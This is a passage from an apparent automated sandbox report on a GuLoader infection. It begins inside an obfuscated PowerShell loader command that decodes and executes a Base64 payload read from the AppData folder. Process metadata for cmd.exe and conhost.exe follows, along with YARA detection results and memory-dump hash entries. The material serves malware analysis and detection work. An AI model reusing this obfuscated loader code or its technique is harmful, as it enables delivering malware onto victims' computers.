H,lbsAntileEjendnUgunsdH ssesSockhpDuo eaiac.hcSe,sieCockm.Dand,cTe.rio MostmPaleo/S ubopUnvolrA.totoBeton/Gstg d R.sll .nsa/Intero eriegSemicmshivo6FjernqSlagtcPhilt ';$Kragerede=Hystadens 'Proph>Knuck ';$Searchlights=Hystadens ' genni AfteeTr,nsxOutto ';$Eradicated='Tj';$Unvision = Hystadens 'finaneUpayacFrotth nonvoS.bma Balsa%Mise aCamoupUnd,spFor,jdO.ercaOverbtDaab,aIrous% ,eds\cam uT TelecRecr,h Non,i laskcResi.kSanit.El phITena.tTrkvoeXylog Pla i& Benm&Foreg Tur.ueTillbcungulhCliteoHabuk Th nkt Epis ';Billedhuggeren (Hystadens ' Trde$AnnamgVin alvoldto Sul,b .orka .elilSting:GraphBSpasmoUdbl r Acrad.uldsi,eerbnSpatlgS.sed= Su a(BuffwcFro bmXylogdSagvo Primr/DobbecEksdi Drugg$DekleULmarkn Jun.vMuslii VentsBekl.iRut foRigkenGeoem)No di ');Billedhuggeren (Hystadens 'Manip$ paitgHyperl.nedkoPetrobP,epra ydrolI.ter:D lesJtenora.ransr AsienMang.oNg,el=A,sin$TerraOReuneuLabyrt E engnonvenG isoaBullfwT ngh.Engels.emoupGaperlTelefiZolaet Anlg( Pla.$Unf oKPr,rerDisora.ftergLys ieBism,rSlambeHipbodChople .ass) Incu ');$Outgnaw=$Jarno[0];$Cardiospermum= (Hystadens '.isas$UnanigProbalKart oS,inebmi,rea,lerflRetic:RulleSReinseOpslucSt rerEudioeLleuft PortsArbit=YahunN EpiteGala wLamfl-ForglO TilkbCl doj flogeArgotcU.yret Kvle ModarSPrivayfyldesReckotNyctaeInformsamme. unmuNkomm,eRelattPrein.Op.trWbombee Va.sbFjernCNoncolCabuliTroldeUncomnHomoet');$Cardiospermum+=$Bording[1];Billedhuggeren ($Cardiospermum);Billedhuggeren (Hystadens 'Outga$StenoSTurfieKod.scP,ixnr ontreR.tactHyd.osCauli. 
p.cnHharcee Smaga,olysdFloveeDomparAnalesPeize[M rge$.ndekCLgteslFrem,eindtraCloddnLo qulPorcuiNo voeAlacrrNonte2 Tols4 Ante5redni] Syld=campe$MeccaM Fraga,ilgaiLargemYo.kloJ.rdfnMel,e ');$Jumped=Hystadens 'Genn,$OctacSTraade Unsuc TarbrFirmaePhysitNyskasBoo.t.AfvrgDHankaoJust,wArtisn CalylCremaoA.kylaDryerdNonbuFNedgjiBeskrlSvigeeSemif( Ar,f$Sa.meOVejrtuHoejetUnchagA.lytnAd esaAti.gwPyr b,Inbr.$Sili.TNaphte Mdepowell,sJubiloParalf i htfSkudaeSe.esnP mpssValid) mr,l ';$Teosoffens=$Bording[0];Billedhuggeren (Hystadens ' Jack$UltragImbo.lAggreoEnf.vb Fyrta ScanlDumpi:SlurbF,ydisoMud ovgangle RbedoMedi l rgehaWi.letandenetrold= Helt(SemicTNonineS.afnsMirkstEurop-Pri,sPAgiosaKalort Triph.nsin Meiop$VelvaTTra,deSa.enoGrithsLate,ochuckf HjemfProtoeLigkinFa.ersNedsn)Do,um ');while (!$Foveolate) {Billedhuggeren (Hystadens 'Bug e$ErkyngArbe.lForsooCholebStormaSwlealClo h:Fj.nthPolsgu UnwisPistabBalbroKollin ,avld.nengr ankeeArbe tNonc =Fejls$Paus tGendirSinuauRustneM lli ') ;Billedhuggeren $Jumped;Billedhuggeren (Hystadens 'PatenS HypotMarkea SporrB ggetP lse-Zit aSNoaltl ,ataeSpongeBenzipBundf Serri4Domme ');Billedhuggeren (Hystadens 'Fremd$ D,sogEfterl OveroZest,bTressaChur,lOplad:,dervFUraadoAmak vSignaeUvennoFr,mslGenlyaPallatConteeh.spa= Cycl(I.rigTFiefdeHypoasRugkit Over-InsecP PrelaData,tParchh Care Ginse$AdeesTMulseeShlepo NedssKnibtoVejr f GlotfKommae,ishtnCh essDrvpa)Grum ') ;Billedhuggeren (Hystadens 'Ihrd $VrelsgL.quilForsvoSan tbUncreaTorywlSamvr: TurbHReaccjArcadr R,ine ,oelaOst.afMckenlNyv,reTalefdMilienartsfiSensinL.fayg Ek,ps Im r=lngde$UnautgZaphrlScrapoBajonbCo,ciaIsognlHo,ot:UdsprFLaxnei.heels S,uakI dfre xumbr Popuigip.nmMembrian.grnForbei MaarsUdbrdt AugueLft.brAmph iIndsteTrol rServenLyoneeVaretsExten+Terre+Firma%Hikha$DllesJMetriaHap ir subsnNon uoMeteo. 
S.utcFetico Bothu AmalnComb,tD.ivb ') ;$Outgnaw=$Jarno[$Hjreaflednings];}$Sanitetsvsenernes=303750;$Rehaul=27249;Billedhuggeren (Hystadens 'Europ$DecimgForunlCellioP.ecob WitnaSrskalAlarm:TyverZOrkidaGa,kanInt gnIndtre RodfsTarmp Diegi=Klods ,remsGOmnumeBarost,ophu-UnsadCpaatroRansanAllo,tBasile Bitrn FifotContu Brnde$ lkreT tandeOme eoprosisAutoboFavorf Polyfs,erteDe ronDermisBri a ');Billedhuggeren (Hystadens 'Ba ca$DriftgPilkolLithooTaksebTilkeaGratil bu i:PelsePUdplarLi.jeo B,igfTestde ubansStngnsSoergi.ftero Disan Plade Lan,l Thor Ascid=Tr kk Mecop[ ymfoS Chefy HooksSpandtFcpaue imebm.arto.H,dadC.iscooAp linSverivRuffle Sungr PraetEfter] Hebr:Disna:,ctinFConterConquo S.bsm ExflB HalvaMe iosVallaebeh.n6 Yndi4Unv sSSucc.tP,eumrInteriPrearnEcphogZ,rib(Refec$.lshaZInviaaFras.n ForsnRosineSan,esQuadr)skram ');Billedhuggeren (Hystadens 'Mrk i$Meditg,kovdlTraveoSamarbSvagsaVe.galPr.pl:FodfoP hretuPrec sManu,s Ar.ylDej,geBilleyDompr Teary=Tameh Defib[Tapr,S HoneyTi,ris ,ksktPari,e ,konmcr,me.BitteTHlereeSchelxU tratRinch.ravnsEFreshnIntercBa ndoHusvidNonreiPoikinSadhegAnili]F.der:Desua:CatadASmkl,SUdklaCGreb.IStvniIIvori.HundeGAkadeeCussetHjlp SHy.tetSpermrArabeiModernM,xomgTre,s(Indek$Li sePPetitrdecreodrevefSvinee D,gosBuk,hszwzriiSuperoEmb,lnRidd e,prdelHovet) Int, ');Billedhuggeren (Hystadens ' regn$prel g OrgilBeclooPageabDykkeaCal,alTrodd:Mi.roPCompuapens pDecadi Ma.grPraamaBuln r ,inakKonsti,ilflvTermi6 P,er1Sover= bea.$PolygPFor,tuXenogs MiddsR.klalSolise Shony Dep . Pes sMorsiuUigenbRlin,sPensutShopbrFiskeiOrnitnrickagDem.r(Topog$Unde.S ommaa.kistn .eski redjtManifeBrne,tPredis ra ivU skrsF lkeeFo,danAgrose.ntrerHebranGal eebackbs ,oci, ,aan$DukseR Op.yeF gbghU.artaSqu ruStbnilco.ro) Loui ');Billedhuggeren $Papirarkiv61;"
                                                Imagebase:0x7ff7be880000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2139881223.00000289B4A73000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                Target ID:3
                                                Start time:15:03:24
                                                Start date:23/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:5
                                                Start time:15:03:27
                                                Start date:23/05/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tchick.Ite && echo t"
                                                Imagebase:0x7ff6e68e0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2162542169.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 92dc37583e34b387b0584ef65fd4be9206339996819433bf345a92e908f30823
                                                  • Instruction ID: 87f8cde6656c1ec0ca81d6981074fc3931101a5a78d22aacb0874a3b49d00256
                                                  • Opcode Fuzzy Hash: 92dc37583e34b387b0584ef65fd4be9206339996819433bf345a92e908f30823
                                                  • Instruction Fuzzy Hash: 85E1E231E0EACA8FEBA5EF2868552B57BE1EF55250F4801FAD00DC71D3FA18E8458345
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2162542169.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f27e9217f47efc56028098576af9d8c0efe81104e14a74cfca86ff889d6bcde5
                                                  • Instruction ID: 60214e0fa230f6b04a7dd607c8b61062814113b1b8e4f4e158ba70b2152b1f29
                                                  • Opcode Fuzzy Hash: f27e9217f47efc56028098576af9d8c0efe81104e14a74cfca86ff889d6bcde5
                                                  • Instruction Fuzzy Hash: AA31A161D1EAC64FFBA5AA2928252B87AE1EF066A5F4801FAD40DD31D2FD0CE8044256
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2162199861.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3e8110072008822f9b851662dbd92c3d0a0b45f8918f2b52d7721439382d7d88
                                                  • Instruction ID: 5581c1bbeeb35668f75aff93aa97cf07b4c35495046711a11288b2c77098a6b1
                                                  • Opcode Fuzzy Hash: 3e8110072008822f9b851662dbd92c3d0a0b45f8918f2b52d7721439382d7d88
                                                  • Instruction Fuzzy Hash: 4001677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695D736E881CB45